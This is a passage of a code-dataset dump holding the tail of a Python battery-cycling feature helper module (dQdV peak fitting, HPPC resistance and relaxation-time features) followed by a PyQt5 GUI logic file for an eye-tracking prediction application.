'VoigtModel']: # for now VoigtModel has gamma constrained to sigma\n model.set_param_hint('sigma', min=1e-6, max=x_range)\n model.set_param_hint('center', min=x_min, max=x_max)\n model.set_param_hint('height', min=1e-6, max=1.1 * y_max)\n model.set_param_hint('amplitude', min=1e-6)\n\n default_params = {\n prefix + 'center': x_min + x_range * np.random.randn(),\n prefix + 'height': y_max * np.random.randn(),\n prefix + 'sigma': x_range * np.random.randn()\n }\n else:\n raise NotImplemented(f'model {basis_func[\"type\"]} not implemented yet')\n if 'help' in basis_func: # allow override of settings in parameter\n for param, options in basis_func['help'].items():\n model.set_param_hint(param, **options)\n model_params = model.make_params(**default_params, **basis_func.get('params', {}))\n if params is None:\n params = model_params\n else:\n params.update(model_params)\n if composite_model is None:\n composite_model = model\n else:\n composite_model = composite_model + model\n return composite_model, params\n\n\ndef update_spec_from_peaks(spec, model_indices, peak_voltages, peak_dQdVs, peak_widths=(10,), **kwargs):\n x = spec['x']\n y = spec['y']\n x_range = np.max(x) - np.min(x)\n\n for i, j, model_index in zip(peak_voltages, peak_dQdVs, model_indices):\n model = spec['model'][model_index]\n\n if model['type'] in ['GaussianModel', 'LorentzianModel', 'VoigtModel']:\n params = {\n 'height': peak_dQdVs[j],\n 'sigma': x_range / len(x) * np.min(peak_widths),\n 'center': peak_voltages[i]\n }\n if 'params' in model:\n model.update(params)\n else:\n model['params'] = params\n else:\n raise NotImplemented(f'model {basis_func[\"type\"]} not implemented yet')\n return\n\n\ndef generate_dQdV_peak_fits(processed_cycler_run, rpt_type, diag_nr, charge_y_n, plotting_y_n=0, max_nr_peaks=4):\n \"\"\"\n Generate fits characteristics from dQdV peaks\n\n Args:\n processed_cycler_run: processed_cycler_run (beep.structure.ProcessedCyclerRun)\n diag_nr: if 1, takes dQdV of 1st RPT past the initial diagnostic, 0 (default) is initial dianostic\n charge_y_n: if 1 (default), takes charge dQdV, if 0, takes discharge dQdV\n\n\n Returns:\n dataframe with Amplitude, mu and sigma of fitted peaks\n \"\"\"\n # Uses isolate_dQdV_peaks function to filter out peaks and returns x(Volt) and y(dQdV) values from peaks\n\n data, no_filter_data, peak_voltages, peak_dQdVs = isolate_dQdV_peaks(processed_cycler_run, rpt_type=rpt_type, \\\n charge_y_n=charge_y_n, diag_nr=diag_nr,\n max_nr_peaks=max_nr_peaks,\n half_peak_width=0.07)\n\n no_filter_x = no_filter_data.voltage\n no_filter_y = no_filter_data.dQdV\n\n ####### Setting spec for gaussian model generation\n\n x = data.voltage\n y = data.dQdV\n\n # Set construct spec using number of peaks\n model_types = []\n for i in np.arange(max_nr_peaks):\n model_types.append({'type': 'GaussianModel', 'help': {'sigma': {'max': 0.1}}})\n\n spec = {\n 'x': x,\n 'y': y,\n 'model': model_types\n }\n\n # Update spec using the found peaks\n update_spec_from_peaks(spec, np.arange(max_nr_peaks), peak_voltages, peak_dQdVs)\n if plotting_y_n:\n fig, ax = plt.subplots()\n ax.scatter(spec['x'], spec['y'], s=4)\n for i in peak_voltages:\n ax.axvline(x=peak_voltages[i], c='black', linestyle='dotted')\n ax.scatter(peak_voltages[i], peak_dQdVs[i], s=30, c='red')\n\n #### Generate fitting model\n\n model, params = generate_model(spec)\n output = model.fit(spec['y'], params, x=spec['x'])\n if plotting_y_n:\n # #Plot residuals\n # fig, gridspec = output.plot(data_kws={'markersize': 1})\n\n ### Plot components\n\n ax.scatter(no_filter_x, no_filter_y, s=4)\n ax.set_xlabel('Voltage')\n\n if charge_y_n:\n ax.set_title(f'dQdV for charge diag cycle {diag_nr}')\n ax.set_ylabel('dQdV')\n else:\n ax.set_title(f'dQdV for discharge diag cycle {diag_nr}')\n ax.set_ylabel('- dQdV')\n\n components = output.eval_components()\n for i, model in enumerate(spec['model']):\n ax.plot(spec['x'], components[f'm{i}_'])\n\n # Construct dictionary of peak fits\n peak_fit_dict = {}\n for i, model in enumerate(spec['model']):\n best_values = output.best_values\n prefix = f'm{i}_'\n peak_fit_dict[prefix + \"Amp\"] = [peak_dQdVs[i]]\n peak_fit_dict[prefix + \"Mu\"] = [best_values[prefix + \"center\"]]\n peak_fit_dict[prefix + \"Sig\"] = [best_values[prefix + \"sigma\"]]\n\n # Make dataframe out of dict\n peak_fit_df = pd.DataFrame(peak_fit_dict)\n\n return peak_fit_df\n\n\n\ndef interp(df):\n '''\n this function takes in a data frame that we are interested in, and\n returns an interpolation function based on the discharge volatge and capacity\n '''\n V = df.voltage.values\n Q = df.discharge_capacity.values\n f = interp1d(Q, V, kind='cubic', fill_value=\"extrapolate\")\n return f\n\n\ndef list_minus(list1, list2):\n \"\"\"\n this function takes in two lists and will return a list containing\n the values of list1 minus list2\n \"\"\"\n result = []\n zip_object = zip(list1, list2)\n for list1_i, list2_i in zip_object:\n result.append(list1_i - list2_i)\n return result\n\n\ndef get_hppc_ocv_helper(cycle_hppc_0, step_num):\n \"\"\"\n this helper function takes in a cycle and a step number\n and returns a list that stores the mean of the last five points of voltage in different\n step counter indexes (which is basically the soc window)\n \"\"\"\n chosen1 = cycle_hppc_0[cycle_hppc_0.step_index == step_num]\n voltage1 = []\n step_index_counters = chosen1.step_index_counter.unique()[0:9]\n for i in range(len(step_index_counters)):\n df_i = chosen1.loc[chosen1.step_index_counter == step_index_counters[i]]\n voltage1.append(df_i['voltage'].iloc[-10].mean()) # take the mean of the last 10 points of the voltage value\n return voltage1\n\n\ndef get_hppc_ocv(processed_cycler_run, diag_num):\n '''\n This function takes in cycling data for one cell and returns the variance of OCVs at different SOCs\n diag_num cyce minus first hppc cycle(cycle 2)\n Argument:\n processed_cycler_run(process_cycler_run object)\n diag_num(int): diagnostic cycle number at which you want to get the feature, such as 37 or 142\n Returns:\n a float\n the variance of the diag_num minus cycle 2 for OCV\n '''\n data = processed_cycler_run.diagnostic_interpolated\n cycle_hppc = data.loc[data.cycle_type == 'hppc']\n cycle_hppc = cycle_hppc.loc[cycle_hppc.current.notna()]\n step = 11\n step_later = 43\n cycle_hppc_0 = cycle_hppc.loc[cycle_hppc.cycle_index == 2]\n # in case that cycle 2 correspond to two cycles one is real cycle 2, one is at the end\n cycle_hppc_0 = cycle_hppc_0.loc[cycle_hppc_0.test_time < 250000]\n voltage_1 = get_hppc_ocv_helper(cycle_hppc_0, step)\n chosen = cycle_hppc.loc[cycle_hppc.cycle_index == diag_num]\n voltage_2 = get_hppc_ocv_helper(chosen, step_later)\n dv = list_minus(voltage_1, voltage_2)\n return np.var(dv)\n\n\ndef get_hppc_r(processed_cycler_run, diag_num):\n '''\n This function takes in cycling data for one cell and returns the resistance at different SOCs with resistance at the\n first hppc cycle(cycle 2) deducted\n Argument:\n processed_cycler_run(process_cycler_run object)\n diag_num(int): diagnostic cycle number at which you want to get the feature, such as 37 or 142\n Returns:\n two floats\n the variance of the diag_num - cycle 2 for HPPC resistance for both charge and discharge\n '''\n data = processed_cycler_run.diagnostic_interpolated\n cycle_hppc = data.loc[data.cycle_type == 'hppc']\n cycle_hppc = cycle_hppc.loc[cycle_hppc.current.notna()]\n cycles = cycle_hppc.cycle_index.unique()\n if diag_num not in cycles:\n return None\n steps = [11, 12, 14]\n states = ['R', 'D', 'C']\n results_0 = {}\n results = {}\n resistance = {}\n dr_d = {}\n cycle_hppc_0 = cycle_hppc.loc[cycle_hppc.cycle_index == 2]\n # in case that cycle 2 correspond to two cycles one is real cycle 2, one is at the end\n cycle_hppc_0 = cycle_hppc_0.loc[cycle_hppc_0.test_time < 250000]\n for i in range(len(steps)):\n chosen = cycle_hppc_0[cycle_hppc_0.step_index == steps[i]]\n state = states[i]\n result = get_V_I(chosen)\n results_0[state] = result\n results[2] = results_0\n steps_later = [43, 44, 46]\n # step 43 is rest, 44 is discharge and 46 is charge, use the get ocv function to get the voltage values\n # and calculate the over potential and thus the resistance change\n for i in range(1, len(cycles)):\n chosen = cycle_hppc[cycle_hppc.cycle_index == cycles[i]]\n results_s = {}\n for j in range(len(steps_later)):\n chosen_s = chosen[chosen.step_index == steps_later[j]]\n state = states[j]\n results_s[state] = get_V_I(chosen_s)\n results[cycles[i]] = results_s\n # calculate the resistance and compare the cycle evolution\n keys = list(results.keys())\n resistance['D'] = {}\n resistance['C'] = {}\n for i in range(len(keys)):\n d_v = results[keys[i]]['D']['voltage'] # discharge voltage for a cycle\n c_v = results[keys[i]]['C']['voltage'] # charge voltage for a cycle\n r_v = results[keys[i]]['R']['voltage'] # rest voltage for a cycle\n r_v_d = r_v[0:min(len(r_v), len(d_v))] # in case the size is different\n d_v = d_v[0:min(len(r_v), len(d_v))]\n c_v = c_v[0:min(len(r_v), len(c_v))]\n r_v_c = r_v[0:min(len(r_v), len(c_v))]\n d_n = list(np.array(d_v) - np.array(r_v_d)) # discharge overpotential\n c_n = list(np.array(c_v) - np.array(r_v_c)) # charge overpotential\n resistance['D'][keys[i]] = np.true_divide(d_n, results[keys[i]]['D']['current'])\n resistance['C'][keys[i]] = np.true_divide(c_n, results[keys[i]]['C']['current'])\n resistance_d = resistance['D']\n resistance_c = resistance['C']\n dr_c = {}\n SOC = list(range(10, 100, 10))\n for i in range(1, len(keys)):\n resistance_d_i = resistance_d[keys[i]]\n resistance_d_0 = resistance_d[keys[0]]\n resistance_d_0 = resistance_d_0[0:min(len(resistance_d_i), len(resistance_d_0))]\n dr_d[keys[i]] = list(resistance_d_i - resistance_d_0)\n for i in range(1, len(keys)):\n resistance_c_i = resistance_c[keys[i]]\n resistance_c_0 = resistance_c[keys[0]]\n resistance_c_0 = resistance_c_0[0:min(len(resistance_c_i), len(resistance_c_0))]\n dr_c[keys[i]] = list(resistance_c_i - resistance_c_0)\n f2_d = np.var(dr_d[diag_num])\n f2_c = np.var(dr_c[diag_num])\n return f2_d, f2_c\n\n\ndef get_V_I(df):\n \"\"\"\n this helper functiion takes in a specific step in the first hppc cycle and gives you the voltage values as\n well as the current values after each step in the first cycle.\n \"\"\"\n result = {}\n voltage = []\n current = []\n step_index_counters = df.step_index_counter.unique()[0:9]\n for i in range(len(step_index_counters)):\n df_i = df.loc[df.step_index_counter == step_index_counters[i]]\n voltage.append(df_i['voltage'].iloc[-1]) # the last point of the voltage value\n current.append(df_i['current'].mean())\n result['voltage'] = voltage\n result['current'] = current\n return result\n\n\ndef get_v_diff(diag_num, processed_cycler_run, soc_window):\n \"\"\"\n This function helps us get the feature of the variance of the voltage difference\n across a specific capacity window\n Argument:\n diag_num(int): diagnostic cycle number at which you want to get the feature, such as 37 or 142\n processed_cycler_run(process_cycler_run object)\n soc_window(int): let the function know which step_counter_index you want to look at\n Returns:\n a float\n \"\"\"\n data = processed_cycler_run.diagnostic_interpolated\n hppc_data = data.loc[data.cycle_type == 'hppc']\n # the discharge steps in the hppc cycles step number 47\n hppc_data_2 = hppc_data.loc[hppc_data.cycle_index == diag_num]\n hppc_data_1 = hppc_data.loc[hppc_data.cycle_index == 2]\n # in case a final HPPC is appended in the end also with cycle number 2\n hppc_data_1 = hppc_data_1.loc[hppc_data_1.discharge_capacity < 8]\n hppc_data_2_d = hppc_data_2.loc[hppc_data_2.step_index == 47]\n hppc_data_1_d = hppc_data_1.loc[hppc_data_1.step_index == 15]\n step_counters_1 = hppc_data_1_d.step_index_counter.unique()\n step_counters_2 = hppc_data_2_d.step_index_counter.unique()\n if (len(step_counters_1) < 8) or (len(step_counters_2) < 8):\n print('error')\n return None\n else:\n chosen_1 = hppc_data_1_d.loc[hppc_data_1_d.step_index_counter == step_counters_1[soc_window]]\n chosen_2 = hppc_data_2_d.loc[hppc_data_2_d.step_index_counter == step_counters_2[soc_window]]\n chosen_1 = chosen_1.loc[chosen_1.discharge_capacity.notna()]\n chosen_2 = chosen_2.loc[chosen_2.discharge_capacity.notna()]\n if len(chosen_1) == 0 or len(chosen_2) == 0:\n print('error')\n return None\n f = interp(chosen_2)\n v_1 = chosen_1.voltage.tolist()\n v_2 = f(chosen_1.discharge_capacity).tolist()\n v_diff = list_minus(v_1, v_2)\n if abs(np.var(v_diff)) > 1:\n print('weird voltage')\n return None\n else:\n return v_diff\n\n\ndef get_relaxation_times(voltage_data, time_data, decay_percentage = [0.5, 0.8, 0.99]):\n \"\"\"\n This function takes in the voltage data and time data of a voltage relaxation curve\n and calculates out the time it takes to reach 50%, 80% and 99% of the OCV relaxation.\n\n Args:\n voltage_data(np.array): list of the voltage data in a voltage relaxation curve\n time_data(np.array) : list of the time data corresponding to voltage data\n decay_percentage (list): list of thresholds to compute time constants for\n\n Returns:\n @time_array(np.array): list of time taken to reach percentage of total relaxation\n where percentages are 50%, 80%, and 99% returned in that order.\n\n \"\"\"\n\n # Scaling the voltage data to between 0-1\n final_voltage = voltage_data[-1]\n initial_voltage = voltage_data[0]\n scaled_voltage_data = (voltage_data - initial_voltage) / (final_voltage - initial_voltage)\n\n # shifting the time data to start at 0\n shifted_time_data = time_data - time_data[0]\n\n v_decay_inv = interp1d(scaled_voltage_data, shifted_time_data)\n\n # these are the decay percentages that will correspond to the time values extracted\n time_array = []\n\n for percent in decay_percentage:\n time_array.append(v_decay_inv(percent))\n\n return np.array(time_array)\n\n\ndef get_relaxation_features(processed_cycler_run):\n \"\"\"\n\n This function takes in the processed structure data and retrieves the fractional change in\n the time taken to reach 50%, 80% and 99% of the voltage decay between the first and\n the second HPPC cycles\n\n Args:\n @processed_cycler_run(beep.structure.ProcessedCyclerRun): ProcessedCyclerRun object for the cell\n you want the diagnostic feature for.\n\n Returns:\n @fracTimeArray(np.array): list of fractional difference in time taken to reach percentage of\n total relaxation between the first and second diagnostic cycle. It is organized such that\n the percentages 50%, 80%, and 99% correspond to a given column, and the rows are different\n SOCs of the HPPC starting at 0 with the highest SOC and going downwards.\n \"\"\"\n\n total_time_array = []\n\n # chooses the first and the second diagnostic cycle\n for hppc_chosen in [0, 1]:\n\n # Getting just the HPPC cycles\n hppc_diag_cycles = processed_cycler_run.diagnostic_interpolated[processed_cycler_run.diagnostic_interpolated.cycle_type == \"hppc\"]\n\n # Getting unique and ordered cycle index list for HPPC cycles, and choosing the hppc cycle\n hppc_cycle_list = list(set(hppc_diag_cycles.cycle_index))\n hppc_cycle_list.sort()\n\n # Getting unique and ordered Regular Step List (Non-unique identifier)\n reg_step_list = hppc_diag_cycles[hppc_diag_cycles.cycle_index == hppc_cycle_list[hppc_chosen]].step_index\n reg_step_list = list(set(reg_step_list))\n reg_step_list.sort()\n\n # The value of 1 for regular step corresponds to all of the relaxation curves in the hppc\n reg_step_relax = 1\n\n # Getting unique and ordered Step Counter List (unique identifier)\n step_count_list = hppc_diag_cycles[(hppc_diag_cycles.cycle_index == hppc_cycle_list[hppc_chosen]) &\n (hppc_diag_cycles.step_index == reg_step_list[reg_step_relax])].step_index_counter\n step_count_list = list(set(step_count_list))\n step_count_list.sort()\n # The first one isn't a proper relaxation curve(comes out of CV) so we ignore it\n step_count_list = step_count_list[1:]\n\n # 9x2 array where the rows are the different SOC starting high to low and columns are percent degrad\n # initialized to all nans so when they can't be calculated it has a nan in its place\n all_time_array = np.nan * np.ones((9, 3))\n\n # gets all the times for a single SOC per loop\n for soc_num in range(0, len(step_count_list)):\n relax_curve_df = hppc_diag_cycles[(hppc_diag_cycles.cycle_index == hppc_cycle_list[hppc_chosen]) &\\\n (hppc_diag_cycles.step_index_counter == step_count_list[soc_num])]\n\n time_array = get_relaxation_times(np.array(relax_curve_df.voltage), np.array(relax_curve_df.test_time))\n all_time_array[soc_num][:] = time_array\n\n total_time_array.append(all_time_array)\n\n return total_time_array[1] / total_time_array[0]\n\n","sub_path":"beep/helpers/featurizer_helpers.py","file_name":"featurizer_helpers.py","file_ext":"py","file_size_in_byte":22553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"121043279","text":"import os.path\nimport sys\n\nfrom PyQt5.QtWidgets import QWidget, QFileDialog, QMessageBox\nfrom PyQt5 import QtCore, QtWidgets, uic\nfrom PyQt5.QtCore import QThread, pyqtSignal\nfrom modules.program_manager import *\nfrom pathlib import Path\n\napp = None # global variable bound to the QtWidgets.QApplication instance.\nmain_window = None # global variable bound to EyePredict application object.\n\nclass PredictionThread(QThread):\n \"\"\"\n Thread object class, used for \"Predict\" tab's processes.\n \"\"\"\n\n # A signal preparation\n alert = pyqtSignal(str)\n\n def __init__(self, program_manager, action, features=[], exclusion_category=\"\", num_to_exclude=\"\", iterations=\"\"):\n \"\"\"\n Make a new thread instance with the specified arguments.\n All arguments used for prediction processes, some arguments are optional for some prediction actions.\n :param program_manager: The program manger to activate by predication actions request/s.\n :param action: The requested action to preform (\"Cross Validation\", \"Fit Model\", \"Predict\").\n :param features: Selected features to extract.\n :param exclusion_category: column label from the behavioral data, will be used for trial grouping during learning.\n :param num_to_exclude: The number of groups that will be excluded during training (int).\n :param iterations: Maximum iterations number for the training session.\n \"\"\"\n # QThread.__init__(self)\n super(PredictionThread, self).__init__()\n self.program_manager = program_manager\n self.features = features\n self.exclusion_category = exclusion_category\n self.num_to_exclude = num_to_exclude\n self.iterations = iterations\n self.action = action\n\n def __del__(self):\n self.wait()\n\n def run(self):\n \"\"\"\n Begin thread's run, calling the requested prediction actions.\n :return: void\n \"\"\"\n if self.action != \"Cross Validation\" and self.action != \"Fit Model\" and self.action != \"Predict\":\n return\n\n self._block_gui_buttons()\n self._start_prediction_action()\n self.program_manager.reset_stop_flags() # reset flags that have been used to cancel the process.\n self._free_gui_buttons()\n\n def _start_prediction_action(self):\n \"\"\"\n call program_manger with the supplied arguments, and update the \"Result\" label as necessary.\n :return: void \n \"\"\"\n # predict\n main_window.ResultLable.setStyleSheet(\"color: rgb(0, 0, 0); font: 16pt 'Tahoma';\")\n main_window.ResultLable.setText(self.action + \" Process \\nIs Running...\")\n return_string, result = self.program_manager.predict(self.features, self.exclusion_category,\n self.num_to_exclude, self.iterations, self.action)\n # Check the process exit status, and update gui_module accordingly\n if return_string == \"Success\":\n main_window.ResultLable.setText(result)\n else:\n main_window.ResultLable.setStyleSheet(\"color: rgb(189, 189, 189); font: 24pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Result...\")\n self.alert.emit(return_string)\n\n def _free_gui_buttons(self):\n \"\"\"\n Set all gui_module buttons enable.\n :return: void\n \"\"\"\n # free gui_module functions\n main_window.ReloadButton.setEnabled(True)\n main_window.ApplyButton.setEnabled(True)\n main_window.LoadButton.setEnabled(True)\n main_window.SaveButton.setEnabled(True)\n main_window.VisualizeButton.setEnabled(True)\n main_window.PredictButton.setEnabled(True)\n main_window.CrossValidationButton.setEnabled(True)\n main_window.FitModelButton.setEnabled(True)\n main_window.SaveModelButton.setEnabled(True)\n main_window.LoadModelButton.setEnabled(True)\n main_window.CancelButton.hide()\n main_window.SaveModelButton.show()\n\n def _block_gui_buttons(self):\n \"\"\"\n Set all gui_module buttons disable, to avoid data processing conflicts.\n :return: void\n \"\"\"\n # Block gui_module functions\n main_window.ReloadButton.setEnabled(False)\n main_window.ApplyButton.setEnabled(False)\n main_window.LoadButton.setEnabled(False)\n main_window.SaveButton.setEnabled(False)\n main_window.VisualizeButton.setEnabled(False)\n main_window.PredictButton.setEnabled(False)\n main_window.CrossValidationButton.setEnabled(False)\n main_window.FitModelButton.setEnabled(False)\n main_window.SaveModelButton.setEnabled(False)\n main_window.LoadModelButton.setEnabled(False)\n main_window.CancelButton.show()\n main_window.SaveModelButton.hide()\n\n\nclass Alert(QWidget):\n \"\"\"\n Widget class to pop user messages\n \"\"\"\n def __init__(self, text):\n super().__init__()\n self.title = 'Alert'\n self.left = 1300\n self.top = 800\n self.width = 320\n self.height = 200\n self.text = text\n self.init_ui()\n\n def init_ui(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n QMessageBox.warning(self, self.title, self.text, QMessageBox.Ok, QMessageBox.Ok)\n self.show()\n\n\nclass Logic(QWidget):\n \"\"\"\n All the logic methods behind the gui_module activation, and a connection to the program's business logic.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.predict_tab_visited = False\n self.program_manager = ProgramManager()\n self.prediction_thread = None\n\n ##########################################################\n # Start Tab Related Functions #\n ##########################################################\n\n def browse_experiment_info_file(self):\n \"\"\"\n Start tab: \"Browse\" button || Data tab: \"Reload...\" button.\n Choose experiment info file.\n Send it to ProgramManager for processing.\n Display loaded behavioral data DataFrame.\n :return: Void\n \"\"\"\n # Pop up file dialog\n options = QFileDialog.Options()\n options |= QFileDialog.ShowDirsOnly\n path, _ = QFileDialog.getOpenFileName(self, \"Choose Experiment Info File\", \"\",\n \"Text Files (*.txt);;Ini Files (*.ini)\", options=options)\n\n # Check if a file was chosen\n if path:\n # Send it to ProgramManager for processing\n return_string, df = self.program_manager.load(path)\n if return_string == \"Success\":\n # Display loaded behavioral data DataFrame\n self._display_dataframe(df)\n main_window.tabWidget.setCurrentIndex(1)\n # Load prediction labels\n main_window.ExclusionCriteriaComboBox.addItems(self.program_manager.get_exclusion_criteria())\n # update the number of items in the predict tab\n self.set_train_test_num()\n else:\n self._display_dataframe(None)\n main_window.ExclusionCriteriaComboBox.clear()\n Alert(return_string)\n\n ##########################################################\n # Data Tab Related Functions #\n ##########################################################\n\n def load_data_filter_query(self):\n \"\"\"\n Data tab: \"Load...\" button.\n Loads data filtering configurations from a chosen .txt file\n :return: Void\n \"\"\"\n # Pop up file dialog\n options = QFileDialog.Options()\n file_path, _ = QFileDialog.getOpenFileName(self, \"Load configuration\", \"\", \"Text Files (*.txt)\",\n options=options)\n # Check if a file was chosen\n if file_path:\n # Read query from file\n query = Path(file_path).read_text()\n # Write query in text box\n main_window.ConfigurationTextEdit.setText(query)\n\n def save_data_filter_query(self):\n \"\"\"\n Data tab: \"Save\" button.\n Saves data filtering configurations to a chosen .txt file\n :return: Void\n \"\"\"\n # Pop up file dialog\n options = QFileDialog.Options()\n file_path, _ = QFileDialog.getSaveFileName(self, \"Save data filtering configurations\", \"\",\n \"All Files (*);;Text Files (*.txt)\", options=options)\n # Check if a file was chosen\n if file_path:\n # Get query from the configuration text box\n query = main_window.ConfigurationTextEdit.toPlainText()\n\n # Write query to file, create if doesn't exists\n with open(file_path, \"w\") as fd:\n fd.write(query)\n\n def _display_dataframe(self, df):\n \"\"\"\n Receives a DataFrame object, containing behavioral data.\n Loads it to the GUI data table, in the Data tab.\n :param df: a DataFrame \n :return: Void\n \"\"\"\n # clean table\n main_window.DataTable.setColumnCount(0)\n main_window.DataTable.setRowCount(0)\n\n if df is None:\n return\n\n # set table dimensions\n main_window.DataTable.setColumnCount(len(df.columns))\n main_window.DataTable.setRowCount(len(df.index))\n\n _translate = QtCore.QCoreApplication.translate\n\n # set headers\n i = 0\n for header in df:\n item = QtWidgets.QTableWidgetItem()\n item.setText(_translate(\"MainWindow\", header))\n main_window.DataTable.setHorizontalHeaderItem(i, item)\n i += 1\n\n # set values\n for i in range(len(df.index)):\n for j in range(len(df.columns)):\n item = QtWidgets.QTableWidgetItem()\n item.setText(_translate(\"MainWindow\", str(df.iat[i, j])))\n main_window.DataTable.setItem(i, j, item)\n\n # Resize table\n main_window.DataTable.resizeColumnsToContents()\n main_window.DataTable.resizeRowsToContents()\n\n def apply_filter_query(self):\n \"\"\"\n Data tab: \"Apply\" button.\n Execute data filter query, and updates data table in Data tab.\n :return: Void\n \"\"\"\n query = main_window.ConfigurationTextEdit.toPlainText()\n\n # Call ProgramManager for query processing\n return_string, df = self.program_manager.filter_data(query)\n if return_string is \"Success\":\n # Display updated data frame\n self._display_dataframe(df)\n # update predict tab (exclusion items number)\n self.set_train_test_num()\n else:\n Alert(return_string)\n\n ##########################################################\n # Visualization Tab Related Functions #\n ##########################################################\n\n def visualize(self):\n \"\"\"\n Visu tab: \"Visualize\" button.\n Collects visualization options and calls visu module to create visualization object and display it.\n :return: Void\n \"\"\"\n # get visualization type to create\n try:\n visu_type = main_window.VisuTypeList.currentItem().text()\n if not main_window.VisuTypeList.currentItem().isSelected():\n raise Exception\n except:\n Alert(\"Please choose a visualization type\")\n return\n\n # get filtering query\n filter_query = main_window.VisuFilterQueryTextEdit.toPlainText()\n\n # get processing method\n process_method = main_window.ProcessingMethodSlider.value() # 0 Simultaneous, 2 MeanCalc\n if process_method is 1: # can be tested later in the chain, and return alert as return_string if needed\n Alert(\"Please choose a processing method\")\n return\n\n # call manager.visualize\n return_string = self.program_manager.visualize(visu_type, filter_query, process_method)\n if not return_string == \"Success\":\n Alert(return_string)\n\n def set_processing_method(self):\n \"\"\"\n Visu tab: \"Processing Method\" slider.\n Styling slider position, using bold font for the chosen method text label. \n :return: void\n \"\"\"\n if main_window.ProcessingMethodSlider.value() is 0:\n main_window.SimultaneousLabel.setStyleSheet(\"font: -10 9pt 'Tahoma';\")\n main_window.MeanCalcLabel.setStyleSheet(\"font: 9pt 'Tahoma';\")\n elif main_window.ProcessingMethodSlider.value() is 1:\n main_window.SimultaneousLabel.setStyleSheet(\"font: 9pt 'Tahoma';\")\n main_window.MeanCalcLabel.setStyleSheet(\"font: 9pt 'Tahoma';\")\n elif main_window.ProcessingMethodSlider.value() is 2:\n main_window.SimultaneousLabel.setStyleSheet(\"font: 9pt 'Tahoma';\")\n main_window.MeanCalcLabel.setStyleSheet(\"font: -10 9pt 'Tahoma';\")\n\n ##########################################################\n # Predict Tab Related Functions #\n ##########################################################\n\n def _get_features_list_from_gui(self):\n \"\"\"\n Get the selected features from the list on \"Predict\" tab, and group it in a list.\n :return: List of features names to extract.\n \"\"\"\n features = []\n for index in range(main_window.FeaturesList.count()):\n if main_window.FeaturesList.item(index).checkState() == QtCore.Qt.Checked:\n features.append(main_window.FeaturesList.item(index).text())\n return features\n\n def cross_validation(self):\n \"\"\"\n Predict tab: \"Cross Validate\" button.\n Extract user's chosen prediction options from the gui_module, verify it, and start a new thread for the cross \n validation process.\n :return: void \n \"\"\"\n # extract prediction options from gui_module\n exclusion_category = main_window.ExclusionCriteriaComboBox.currentText()\n num_to_exclude = main_window.ExcludeLineEdit.text()\n iterations = main_window.IterationsLineEdit.text()\n features = self._get_features_list_from_gui()\n\n # verify the input\n if not features:\n Alert(\"Please choose at least 1 feature for extraction\")\n return\n if (not num_to_exclude.isdigit()) or int(num_to_exclude) < 1 or \\\n int(num_to_exclude) >= int(main_window.ItemsAmountLabel.text()):\n Alert(\"Exclusion amount must be larger than 0 and smaller than the total items count. Digits only.\")\n return\n if iterations != \"-1\":\n if (not iterations.isdigit()) or int(iterations) < 1:\n Alert(\"Cross validation iterations number must be digits only, -1 or larger than 1.\")\n return\n else:\n if int(num_to_exclude) != 1:\n Alert(\"Max iteration (-1) is only allowed when the exclusion amount is 1.\")\n return\n\n # begin\n self._start_prediction_thread(\"Cross Validation\", features=features, exclusion_category=exclusion_category,\n num_to_exclude=num_to_exclude, iterations=iterations)\n\n def fit_model(self):\n \"\"\"\n Predict tab: \"Fit Model\" button.\n Extract user's chosen features from the gui_module, verify, and start a new thread for the model fitting process.\n :return: void \n \"\"\"\n features = self._get_features_list_from_gui()\n if not features:\n Alert(\"Please choose at least 1 feature for extraction\")\n return\n self._start_prediction_thread(\"Fit Model\", features=features)\n\n def predict(self):\n \"\"\"\n Predict tab: \"Predict\" button.\n Extract user's chosen features from the gui_module, verify, and start a new thread for the prediction process.\n :return: void \n \"\"\"\n features = self._get_features_list_from_gui()\n if not features:\n Alert(\"Please choose at least 1 feature for extraction\")\n return\n self._start_prediction_thread(\"Predict\", features=features)\n\n def _start_prediction_thread(self, action, features=[], exclusion_category=\"\", num_to_exclude=\"\", iterations=\"\"):\n \"\"\"\n Create prediction thread instance, connect it to a signal, and start the threads run.\n :param action: The prediction action to preform.\n :param features: Selected features to extract.\n :param exclusion_category: column label from the behavioral data, will be used for trial grouping during learning.\n :param num_to_exclude: The number of groups that will be excluded during training (int).\n :param iterations: Maximum iterations number for the training session.\n :return: void\n \"\"\"\n self.prediction_thread = PredictionThread(self.program_manager, action, features=features,\n exclusion_category=exclusion_category, num_to_exclude=num_to_exclude,\n iterations=iterations)\n self.prediction_thread.alert.connect(self.raise_alert)\n self.prediction_thread.start()\n\n def save_model(self):\n \"\"\"\n Predict tab: \"Save Model\" button.\n Saves prediction model to a chosen .pkl file (pickle).\n :return: Void\n \"\"\"\n # Pop up file dialog to choose a path for saving\n options = QFileDialog.Options()\n path, _ = QFileDialog.getSaveFileName(self, \"Save Model\", \"\",\n \"Pickle files (*.pkl)\", options=options)\n # If a path was chosen, begin saving\n if path:\n main_window.ResultLable.setStyleSheet(\"color: rgb(0, 0, 0); font: 18pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Saving Model...\")\n return_string = self.program_manager.save_ml_model(path)\n\n # Update gui_module with the saving results, fail/success.\n if return_string == \"Success\":\n main_window.ResultLable.setText(\"Model Saved.\")\n else:\n main_window.ResultLable.setStyleSheet(\"color: rgb(189, 189, 189); font: 24pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Result...\")\n Alert(return_string)\n\n def load_model(self):\n \"\"\"\n Predict tab: \"Load Model\" button.\n Loads a trained prediction model from a chosen .pkl file (pickle).\n :return: Void\n \"\"\"\n # Pop up file dialog to choose the model to load\n options = QFileDialog.Options()\n options |= QFileDialog.ShowDirsOnly\n path, _ = QFileDialog.getOpenFileName(self, \"Choose a pickled model to load\", \"\",\n \"Pickle Files (*.pkl)\", options=options)\n # If a path was chosen, load the model\n if path:\n main_window.ResultLable.setStyleSheet(\"color: rgb(0, 0, 0); font: 18pt 'Tahoma';\")\n main_window.ResultLable.setText(\"Loading Model...\")\n return_string = self.program_manager.load_ml_model(path)\n\n # Update gui_module with the loading results, fail/success.\n if return_string == \"Success\":\n main_window.MLModelComboBox.clear()\n main_window.MLModelComboBox.addItems(self.program_manager.get_available_models())\n main_window.ResultLable.setText(\"Model List Updated\")\n else:\n 